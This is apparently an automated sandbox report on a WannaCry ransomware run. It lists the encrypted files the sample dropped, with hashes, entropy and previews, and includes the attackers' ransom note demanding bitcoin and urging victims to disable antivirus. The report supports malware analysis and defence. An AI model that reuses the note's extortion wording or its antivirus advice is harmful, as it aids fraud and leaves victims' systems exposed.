                                SHA-256:7B6FF82883964F51C23FBEA9C743CFDC0636E3B63F0F2482CC07DD59E5B9D5EB
                                SHA-512:C58724A4230F6827F7377B4220159889F79794890F57772AB3C77C7CCDEEF496314B07A61571F4CE789BA688C5AEF1C151A025ECA9F66BB31FE3CAA6C8B06760
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......b.;.p2r*G.Ln!.(R-.?b.KV.p..|...3.Y...\.......vn5..>.......{.%._........2.=:0..L....L..g...`L@.........Os_..t.t.V.....l$.as..J...vR7..:..)[..[..16%x.,.L1..cL.r/q1i.$..haf....o*..a-.&G...,../.9..&...r$l&.....+(.3.j.0..y..!.<)R..}r..i..qn.D.z.9.....Z.......k.=.j4ovG....<.v....4.%2.:.n...2...k.<.0t.~..Q.G..Ek@2..+l...j......;.W.}!#......^...T.$-..

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28952
                                Entropy (8bit):7.992489080804419
                                Encrypted:true
                                SSDEEP:768:7HqU1oxtWjfFmqVIKDrSf4IrCZirv/4pK5AReiAIho:7HqU6xMNmKIKDef4ViT/4pGOAIW
                                MD5:8ECE7E89E85B8198AF562B5761C3509E
                                SHA1:9A9033A56CB7FC4D39BE0E6D009EBC0117C74A5C
                                SHA-256:1E6DFE5A1060405E31864A86DFE15BB9B54CE4081823D4CC5DB79CBFCB35CB54
                                SHA-512:9F9840E46E930FC35EBB0B7B8069BE9EB5A968E5E73B18823208B1AC5CB41F704BDA3A2593ECA9DA935592D988A25693D4B9B6C2F8242432E78752DEF08B7465
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....2K3.k;..I6.Z...\.).?W.H....O..Q....L"<.|..5..0....6.c.N..&.3.'g.t..E.Q...?M..h.....>k...lA.#w._~....g...o..........".....UW`...ic..c.H,).A.....).B.P.i....$.Jn...5..3C...l.`..i.w..>..4|..U.:E,c8X..w/.P....H...,..?.[......JF.D...rx9...v..A....T......p........7R..$.6...#.d.$...D.....@..\......i.4..[V.....h........'!ot.\..S.....\W)@p.....m4.....r.0)........^L... ...ZM2q...,........S0&..l?...Lp..(.cS.\..=7.ng..].p....xx..... .j.t..:l8. .Nf.C ........K..w'.......H.......7.e...e.o...X ...^n...:..'....m.Tw00....G.......!....T:!..OV.`u....W.....\Y@..v.......?..P'c.q68B.{..Q.&.]+...........k6z.._.......;..ux.N..9.|.5W.~/#....!.....ay..x.......R5M..c..F.YiV.8.....)...j....Z..0.UA.\.RC..ag7.G>L.kv..{x}......PU1,G23M.wM\.w......U..PhR..}..?........I.....L..c'A.F.=D..ha.vE...n'.T\(J..S..J........dI...<9_..c.X..VG...H.tE..w.L...g..T.o......z..c..tj7U\a,.{....E..\..4..!]..G5..g..kN....2..d..a.N....{..m...G[:.%.&.....y.E.ZY}.94.$G*...."..7....%...

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.988451241531449
                                Encrypted:false
                                SSDEEP:384:8CWxTroO4eXvRngvHHFZ2vY/ixfexyV5PubkC5vu:mTMOzXlqH2vX8E5PuQmu
                                MD5:6790291A332E27F9BE5B745188AEAC31
                                SHA1:F63CF941875103FF043B5D34FDBC129B5B496856
                                SHA-256:F663D05D7F9527BF16DCCE31C9F9563278394E0BCBADA56E98D5975F496D0083
                                SHA-512:9481F4C2A1F24311F3146B78468DDDC793CC9DDB8A2204739A353672B1C6031C6CDA77EBB4D1131D11BBE33CD38E19013DF1895E870775F0F3BE27A3FB3847EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......e..y../@....%......@.A.1./d.....'...+..../..1...\.......w+.Rp%.Y.f.@,..&....G.N..?....es.&..UK...-t...x.U....M......#....N...s.Q........f..i...8.H.2K._......jo...iw.?....{YUp,.i7........4...XQ&.h......s.'.....)....3..%...k...<m>..E.....@......_.A.29rB.+....K.... ....<.V..A.../.{.u.......L.1~..p..U..D.K0m.Pt..8..J0..bx..-Hl..wn....Vh.;.w.j..vb.2..|..a..5..X...?....A.\nH...{f."...Cg.AX...vo_:dQ.YM.+1.^;..A..K..X..p.!..v"..y!xN.p..y>:W:....0.IK....?...........V.[]..>...o.......1....v.u.h..Nk..P5.(\.0....w...Q2d|T......X.....C..eF.N..P..*Nk...]..#..(..'r...u>?.1.(M>}..].H^\.`....u.r.M.S.!. ..-.n.J..2?J.....#....?$..n......`.,t..2k5.yJ...i.]..6...S_}.Q/\..#.....F=..\...........`.V3...............t.3)C:{........A..2#j.."o.....CWs...lE.](...y_._>.."..s.G.h...$.o. ....O.......?.D..........t).>R6...Pp.\.d6.......W.u...-A>.7.I7.&.'A..l..8...3..h.k......|J.<..O<6n.;7...][*.G.b.,.............r<._W..; .8.7s.#(......=H\.Y......d

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24904
                                Entropy (8bit):7.991995403764266
                                Encrypted:true
                                SSDEEP:768:QW8F9ZP+1WNaslWRk4tjuX4RvWXoLQk7ac:QsWNasEtjuX4pM4
                                MD5:E77D6A2A97C62693C0429839DD5D0139
                                SHA1:08EA962F59FB43239094301BC7F4998FF4E29D20
                                SHA-256:0D3B4403EB61F7BBADA12A422A06E37D550F79B92CA290C039AC164FDFE6B0A9
                                SHA-512:D498F6FC0DE6A4680D92D861106EC4167926F2C5FE6C9BE4973BE2537BBA43776A32DDAE4FDBCEA840019E2536F722B39C2B1D9379FA079F09EC3B37A71B6B07
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....~....?.Q(o.?..'m.z.'..1...nq~....V"!s.Y....w....~9.]6...;.qRek^..;.A.2.H..()..1z.....>j+....B.X_~...x]7kV..[@..(.....].....Q.l.....\....Fz=..`....f.]7.r..#.a....RV..}...>......uy....9q[.q.7..?xe^_..2+..KH=*.c...g..=.7k..+x#:-..7.5..bF...y...5...../`......=.a(m.Db...}%!!.#.+.ay.z..F(..97.....N.......jH...:0..k(K....oX&].A..!......Z...\....".U;.3.....MD..^...o<.8h..WS......L.P6%1.a0...O...........8....G...f..vro. ...F..q.R...s....2tF.....3'.x.n.{.....LD....7..../l...[+|,....1L...,.$.........&.....&+..........%,)h.,..s..g..3.1.@..g..R.......}.>..:..B...d.....k....h..l.p.uC.h....G...z,^?..n.. ...,[#y]......8........y`....L...N...WF:P:N......@M-..p.._Y...m.FQ.9.J.....H3.3J..w.M.t.8........@.yB/.y.T....vN.az....J.&.jP.}h2yL<.m.HH.;..].@...r..{q.y.9...tv.'.B.MJ.............yE6.%z..tr..\uN..."9..@E.&&....0m.=.O.S .K.......e.WZ^[.F.....G..A......q.1U.....^O..[!..C.U...s..7..Z...hMHwM..m..UW\.....p ...w..[7X.:?.1.^...P...<..=%.=#....Q}..

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):277304
                                Entropy (8bit):7.999336732929792
                                Encrypted:true
                                SSDEEP:6144:djsQfYj/Hbz3sj6HjDN4ywoDuf1ZMt1ocXno7os+zS:dFQj/XcjujZ4lx1s4+zS
                                MD5:7168FACC3FCC45A39607976113136A3B
                                SHA1:1ED82154B119531E61E8BFCD91A7A99373CA5F75
                                SHA-256:BA0BEE8A029E62F9E3995700D90B3D2CB2F3A04EC04780D9D6547728CD061CCC
                                SHA-512:8A904B6A7E61CB99BEAC537BB2B9489F76317DE3C832B341BC80E3A3670134D6C7154E19E9DEC54A81DF2801430B3114F3BE4DDF96A75A67CD29398B0150A3B1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........W...L..#f..;s..s.J.....<......j..9...K."\.2...-..2.X....FY...DYA.C.....c......{$Et.q.l.-J..s'..v..2.4&W..^K?..9N..D...._U...g!...<8......h!37.r..%J.*a</2.QO..d.."j4.)_......>.rP.`..<S..=...q.........t..a.R.jK.. l.....Y;..........D...0.=.<.EQ........:...........a.^u/nF2g.....!.....z........w...X].{..?.l...?.B..H.....+..t).A..HT.Q+.0V#.P.].l`..!x6.G...Hxg.....f. |...N...N.r...L .....m.rm.........8.q.X..6.^".]cF....a....b.u....n......m...l.=`..B.1r.."..(.Dm.*.?...Q.Xe.)_..y.<.u...9>..?aS.m.7......-..O....)g.}...R...LE..l.....6.-.b...lC..-(..8..A:.q...H.OPx......UMQ.l4.Pu...@.7D........a.p.W.. .@n...g.Q..x.p......[.@.w..M...w..d..wul.Ln.3.t.Q.....a.~T<...<.c.D.....\...QL...KC.Qh..G'........v?..h..'_.J...?.g....Uv^q.d.;....(..O...Z.....O. .G.Dv+.o.>ZAI8Z...n.......gz....d8..}.V{v..C.|..,.XFo.t..g.X>.|I.`..@....&...qIw.....".~..D...E.vw..%.:..=j.V.f^..A.u.|...........`......X3...:.....&....'e7&...4....0..>.u.2..A...m.`....?...

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):27000
                                Entropy (8bit):7.99393022209552
                                Encrypted:true
                                SSDEEP:768:bCDqZ8Y6HN1sYJoq1T9mUhZfmLl5gs3jP0m/YXu:mqZ8Y6tOYzT9rfmEs3j8mEu
                                MD5:2B5CA8DD54103D6C565BEC4533DEFA27
                                SHA1:825D49866E3FA225CC1C4024F6665491FD9AB95D
                                SHA-256:D55B05EE09A5A4006148EC1529CB8E613034D91EE2B3A557A28C0C5885E47145
                                SHA-512:DFB99BE6E7F11CD0762D0F898AC68860C1FD9AE8BE7D57855BFCA56B03455A1FEA0480A67466FD6C464ADE9D75C348FD18F9311C362364BA5B04188D55D86248
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....QL..zrl[P..pA.j;>K.w.Z..p...\..p".]...w....LEC.) .].:9 ..v.h...h...H...6{@Q!K..^.."E.j..>........c.gN7..u.....-....UXpm.f~l=.....w..O.~...AJPX..^..j).#..$r7G2. }........~........}..9!.J. ...............5.\$.D...(.Z.@..n...&++u......_k..$.u....Th........]O.Q.....c..OI.c.,2.V....'9..9..,Jx..N.}...@4..P-..h[0...5.uw.T...."QD..G^y...o..r6n..F....5a.....&f...Y.o7.h.Q7$'.t...-s..h.A.U{w..w,.$=R.;..X.......g........U.....|yl...2..I.E.?`B.....4.Z3.6.b.../R.4...'1...2!.w..X5#3C.i.h..........?.2"..I.7w..B..n.;f:.....Z..a2?..&...>T........ZV_.e*T....c......\....4-+.\..N&.[...i..........5.a.D7.u@/....g9....".~../g...,.6;..."....|(L..m8..9b^..9....{.......x.....kz.fr....j.C.Hv...G...?.l6,1.e.......n..n.Zw.x..5..Y!&.M2<.\.....+...[](/..=.*......,...J...d..+*....V......*..m,....^4v...T"[.1..L>..Z.Rl0.Z....~.|t.W.......z.X.:.]....x.R.}.r..{N....79.%..*<...D.\.]t..f..v.;....i.Z.....J..S...@cZFN.......*.u']...1......W..:...J..G+j{...G..U...

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\male_names.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6952
                                Entropy (8bit):7.975707572065335
                                Encrypted:false
                                SSDEEP:192:Qv9Co4tuSlwB92JDGOpoZXjSwr91EPvk9pUtlet:QvI3kmBGOsrTKtlet
                                MD5:E88DDE86FE6A01C2A8F9C085A82AC777
                                SHA1:54FE2D381A3D76E9F0ABB14D189AEFE6554E06FF
                                SHA-256:FACA9B0A539C53CDC269FE4788CDDBB1A6B1A0FEB581814FB9B6693727B5ED29
                                SHA-512:29BE707D46A5AF6C9213C862E0DDEAA2C342B109AC55259219B0791A18A531F7184E65F701F3F340A09D0C7ABE191A42C99862064BD6E4620180F71B0593C580
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......G.. ..v~d8c.u...i....a.y..z=+.'..>....<.o.K7.k.k..Y.xU..Gl:b0....c...h2|. rB?U N..K*...-...R..3%P..Xv...T.1..,....../.a..OBy....t.v..*..7............&L.uhi{5..dB. ......4`.9.,..q\..~!c...=/.VI.)a....}.O9.l./l..#.*.|..r.....S..D..9M..N......^............0]...>;sL......#......[.v3_0?.....u?.1N.J"......+.<.J.......T..4.S.2...TI.....8.....].b..,. K(S..-...-.Gfy...P...%....a...p...Y.c...HY.2..j.....6:P...C.n]$.|....3!.........n.Vy..+.P...?&.k... RG3...oFyk...H'..Pu..M~"g-.m...x...Gi.B.C.....O..%.G....`..b+./..=....{@;]......f.q..N....SJ...#p.W.o..acl.._!.N...Z..Q.)..NM..}.........u.4....\..s...d.5.DX.n...e.b.."s....<}]w..D~...N...,..hCu.8.:....8..L._>.'..g."H.If)..I.7.Y.H....E.0.....<.I`...._...M....hI..x./.%.......9..]..7....YF....U.dKB.9TS..9..8.U...!.._.......b..b.....|..z:X...e.(.H\lOz.a.V....>.`t...,.uQ.k.~.9;TE...F...}X.RnN>!s..y.:....A......p..!+....y.w0V.R....ct>..Ul%..Gk.v.1..8.....5..D.....Of..j...HCv...K...L..

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):242232
                                Entropy (8bit):7.999101401446999
                                Encrypted:true
                                SSDEEP:6144:GQOK3eUp5ZVcH83Ys62AjjPfv7rXFQvg3VyslQB:GQhBp6H83R62AjjPfv7rXFQQV3QB
                                MD5:184B65FAFBAB73592BA86259A84CE0F9
                                SHA1:A32E59E99D902ADE4E347CA8EF5DB36E56783DDB
                                SHA-256:0B7BDE5628564995A7622B89793A16BBA701F546B68962EFB0093B3B96E5D9A6
                                SHA-512:12B534F1DA57E2B3533DE94EF0B757CF7E5A7A9D240F37F5003F7DB4901FF2A39B02F5280D4BD95FA3EF91D09F16609C1E9456D51A8F30ABF22458C53816D057
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!..........A..{...{..7)..2kL....,......../Q}0...{..%K@g..3....H..of....U.J.8..NS.....X>.".9...r..K7......`@_...T....N==.e.?...Q..t@..yl#l+7gIf.ed..."KL.FH.).d.$..0E......(.kD.l..aB...\.G2.;.y..%.2....8.,Xk.+.Lzu..?n>.9.....T...{.!H4.f....'..+...................f9S.2..1L.O..@.$......:.P....U.;.....u....z.mb..<..s.H.F...G{..Qe^'.".........1......4.Hl.v.Cy..u.-.=.q..T.Y.}.M4I.d.B._,......bHt..0..1..3R!A.*^....%.$.{.....4.Z.^.f.f.D..5.......[..vb.(...y.`.(.t'...L.Xd,=>>.SX .e.7.FfM.\C.,.^c!o..AybXY...N..x<zk~...u....^.......!....x...`8....T.....M.0.b.8..F...i&8`..'N.H..>.......a'.,.7...._...#...;up.,K.s.K,J.PD^zo_7..I..,....3.....3...9w....H........`.G..T..-..oTT.......B.H'0..M...8>........G..}...>.D.*.\...C.....0. .$....<.....z....k^.......~]..1..@.......@....>...o....Sc..<SB..#..a.+pwF.....~."p.]...(.(....U..o....Vh..hO.ce..K..s7...P...+..(.j..u2e...]..._...n...~#.,...jr&(+i.o..drm.[[D...C...Rf&t....sR.r..d....i3.<..%..../.Y.|.[.Z.P

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):76360
                                Entropy (8bit):7.997792662915774
                                Encrypted:true
                                SSDEEP:1536:KsqF2AYHp2SIFSFU128vndiHuEusRdY44fqI3qQSHoGq10vQ:KsiYHV3G12yOu2z3IaQ910vQ
                                MD5:24E06A9110A2A0C40D10CAC653EAD0F7
                                SHA1:52A68E5D3A6C812DC5A2C1F582BF67F80A3D8086
                                SHA-256:AA54BBB346444118790FB2EF9584561D47AC548FDB8B9019F532C7BDC9FDEB34
                                SHA-512:525283A80356E899AB10FC1D07401F33E402CBEBD87AE581B370E7E3BB5256448EB44C991355D82398A271DB40B17E5265ADD0A3E167DC005C6EE0D27DCE7FF5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....I.UNM...qj.....)I<..r....z`..Va......El.i.~.0./~;d.E...rd.o..c.O.9..'...'f".....o~)j..G..S....PF..j...H..b.<7U.z........3X.....f.=...."........rq.N....U.xcz....M..F...O. 4.X|.8.Tl.-.<S.......E........'.h~,....B\..1.....F0%k=.%.t.../.......#.<.]....-)......|.3.i.........H.Z..0.......D...v.&kKf.sis..].....H.r....T.s#.Q.uu.;.C.@.3..V:.(z.E..G2/l..p...LcA.H.)....4........F.0..........,....D}s_.D..V9BC...2..Y..(.....P..AV@9...=JU.aG.>..?b.<@.%.i..&.\.zr'...k...0C.k.3.4.. ........t)..Xx.8.u.....0...5]...]..zV....9.,p.4.....IMpwd..mk...?.J|.K../&.[/+2..!.@i.......Q.......0I"oDI.F.+...j..F........S..B...f.*.5.4.K...+.j..<)..i4..9..c..P.....!t..F..n..n.. TR......=.{I..K......{o..#.".....n.>...v,.".Du*.1...a...o...r......le...L.6.h.i..;..b...f].3.,..$.z.C..A.jp..#qrQ.*W-....y..F...k.=....S....q.:i.U%.*EIW.fT....e?l.S..,.t...."@6...<H..B`\.....b...{..W..{.}I..*.7_-.1U....B$97>....3W..0.Vt._.c...l{...E...W#.;..Lv.js..&.!S.".\....@....]..m...H.....g]k

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):164584
                                Entropy (8bit):7.998933938468432
                                Encrypted:true
                                SSDEEP:3072:Mpri4hJ40D96qjEYiccceykh5enL1R4S5QIEhBzg92CzdCeY24N:Mpth8qFpiun83Onzkee
                                MD5:581BF5411DCBBE80ECB5A0AC5317792E
                                SHA1:4B3A6F4B682DC24A869B6D7AA2ED1D2E08C83F1D
                                SHA-256:C3B5470507A82C602C06CA913508E06B05F4F7F95739A35CDC78AA5336A373A5
                                SHA-512:25ED5F14693D9412F3CD8C24C6A2EA0FF02BFDB98275348645D3806672F387F8C1B83E0AA9F953B6CAEE8AC823407D0D1C9B9E918FE3D56FE60B4CF25095B753
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......p...L..ZS.R..1.px.u...u.....s[a..r.f/..o.".z.x.Y{.SK.[..z...G.1.zA....|..k.9.V.+x..J..@~..UhW0A.<.'..L.......Y@......@O..3...\K..E.i.p)BGR.i.QD....L.C^..N..J.E....C..*...?zp....Dv.......s..kK..&..t..Ao...)......]..s....Oyx...5[.f~............gu...K.{.5z . ..?..v>/?.Mu~......<c...Q2hP./..ZLax.)9lns.6...{O.T/..?.j:......hs......i...w..'.Q-.4R..R......9.n...R..~.u..qT..8.z.....q...a.z......%.3C.>ax..Fw.$.*..8?....\Y.t.[bS7p.cq..;=....@..._.a-&...!....v0.<W............yK.+...00..e7..?1U|...0.Z...o.i.....Y^<......GP...e....U..?E}.)h..^B..........g@....!...d0W...n@.^.F..DV........P...........M.Q.7.:./>.si.X."..c.;....+.u........e..N... .8....zO.c.....=...(E.Pa.. ._L..R^....r_..m4S...%..n).t........3......G.......v.=......p.2..'...x..M$...z.o.M....-.?`.)..[weQ.*.C.i.....y..r.....KN..z..x...m] .V.Ohe9.|..?w.......5..zE.z.|E....c<@...R.....o...9..!..".....Eq....o.L.......-={..%L.P....:..h.L...._.31...B/.X...D.

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.155833791510369
                                Encrypted:false
                                SSDEEP:6:bkETnNdxXxKzH1cggFJtzSbKlTccopBl+Zi3G3LPTRFS8fqn:bkEDNdxX/qbKlTtWSGG37tU8y
                                MD5:75485684FC4530BAECBD6A53F39C739C
                                SHA1:68CF60CE968AE93BE9F04BFDD03B3B653DA5E043
                                SHA-256:FFB75AA56B3B954C776901C1C0529476D7071E613E51BE8559877CD95F43DB31
                                SHA-512:DCC70EA07AD17DB48AE621C9F36083308034F72C5D78596F4255A9CF7645FC86458C0E3520FDC542FC2E21F80E5EF9C672DDCF7B993E040EB664B133E7110153
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....\.%..t....-ZF(.cTRn.%.U3.D..dW..V+x|)=.g]..M..(.....d.....9....] :.y...8.GH._.7O\.=......D.<..8..l.U].U..w..m.A$.6QF.4... .cQ..W`....G.-...OO5.\..7....[\*7..y.....@..:m...*+.Y.p.1)...aQ.a<..k....906.T..`... ..=..R..wn~!.-W.^....2.R....l-0.&.................P.=1....O...

                                C:\Users\user\AppData\Local\IconCache.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):27560
                                Entropy (8bit):7.992610377110071
                                Encrypted:true
                                SSDEEP:768:mncjG9L5U65va/kxtctsWMW55sn/aVkLMF8kzjz7c5kM+OV:OvLK65vacxw6C5snSaL2cSy
                                MD5:EBDD8BEDDE90600005A727B00B5967F4
                                SHA1:856E083AC6AE07089443ADDD88FE09D289B7F451
                                SHA-256:20E00AB6C6B79BC061D9753E2C7EBC9B5E02AA5234C67A95BC2E40944BE5D3DF
                                SHA-512:FB970B7E5F740E620A44E19883C0D157A649382CB73555AA9A21131E6561F746F0D369F9378AAA06567BFE70EF35470BC36DF0305193658C6C1F25C38FBE9C6C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......H.@..P..A..$...W].jU.?.Y.-.11m.`...g>[.....y.r...Y$.Pq?."..l..W.$.$......Z....Z......2yz..`.]..3....]...2k..y.="..:.*..<.\.`.~...K...%..bD.......Hq.....8.0..0D..*........@Y..]...i.,..=..u..@...i.2..A.*...Ah......;....Ksp..c.q..X.&HJ\1.K.....j.......h.=.L...V.v...J9..4..pqxf.-85X.\..5.5$H.r.G.....5\x...!.Z..//.zl....>G[...&.m...h..re.. ;.........Tb..fTp..K....".W..1.}X.|..a..l......d...#2(.3.............z...El..y8D.M.-.u...zq...Y.n..X...p.......M.r..J..(V.p......."...5F....ck....e].He...Mk..55s..H.T....3...b..LyE.f....P....E...:...Y&-...I%.6..Q..<...]._..~k...U.tFA.=Q..:.r*.o.i..'\.D.gi..Q..3uL..,..yU!..WK..p.`..3.L..pC..k.Id...j.iIz.p...=..B_.M&.8.h*.8......H/.z.....g...W..x..`.u....7......f..C[......LE...4/.5.[@'.....J.'..A+...j.J....3'.y..-m..N...m.Mt....."....R.j/7.[..m`....=.C...%.T..s..&qI/..U...-.....Vf].W.E..vZ..H......&......x...........fBQ.c>y..i..q..In.)hg....8Iy........y...X.....>...^j...._....X...>.4..8.N...j

                                C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):229640
                                Entropy (8bit):7.999183686930641
                                Encrypted:true
                                SSDEEP:6144:jqikgomW5OiWa/eSyWyD744R82xWT9rfi8gtDKtwIK1:jqikgqjmStyDQ2xWxPHtdK1
                                MD5:72C7C215105C33A2D6CEDF9C258E0A6F
                                SHA1:1476D351EA3E4540A56331C20D0A1C88C9EAF8A9
                                SHA-256:D3693CAD3394F3A200DC3D9CD258454594AFA9BC019E8773C8682BF4E03A1DCA
                                SHA-512:970D2ED636A28DC26B60C8C84CF4093C45ACED7EF1C470BBB33219EDC26D7D43B9BAEEAC219D9D9FA1B8DBCD6021C4CE0830850B825384E05F7C213F5B7386F0
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........{..nb..az,.'.z....D......h..{N.yo..yw..j..}.t...t..Kx].7YZ`..-..8)..i.{3O.A..C....r.S.....v7#F.R..a....e...C..6'3.%.EL.I.......n.3P........@..J.+.[+..V.a..S.>.$.Z).....gBW....."..a/..L.<.L..8.....mN.Lc).. ..d..;..%.p]z,P..e.....&S.U..F.tk.................".U)..g.MWG~F}Y.f.D...7.....h...A..o....m....S.pn...9$.!.?..R.@..~.\.x...Ev..%....x...n.i.....*...1J..R...^..8..oc.z.*/.:....q)R..A.s..6..V. ....!....}-......8.....G6.../N...-/j0...P..%...7.i.b7..|s.;.7.`.3.6F..U.fn..G...=./q?...S..B.....?(.*.._.+m...8.%^.]..?+`f.l.g.a...g..h...;.1...Z`....{..p....Py.}...@...X..V.....m..A|.k.}t.ZZ.X....}$...".8......e.5......X!.G.zd..%.>Xk..(:..x..%.\.Oh..[.R_[a.."B.=.G.w.....}.....H..>$..".,...CZ.H.9..Nc........8.j.j...:ja.#..H......76Zz.]...Q..f......t.].[.5.$...9-..b~b.xaD.y.`.{&.q.&...QL..K...c..."(.....8.._........^..)g...v..).^.`T...99x..:.p.....Up.._;'[....6..8.'.@..".`.D.F.....7......#a....LgtM;.T......:.Nw3......F.....5.eI.uW..;.

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\NGenDisable.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):600
                                Entropy (8bit):7.623341751163981
                                Encrypted:false
                                SSDEEP:12:bkEMp4ZUanDx+A8BABeajgSm+AYk5Yyoys/MbC0PMPwt9EDOGvWl0SE:bktpsDx+sBeaAYk+hpaC0ttuSGv4VE
                                MD5:A7E8E828198A78328AD5B628680EFD3F
                                SHA1:3E8613C9C0EFB5324D447671CAC90DA54AD58A8F
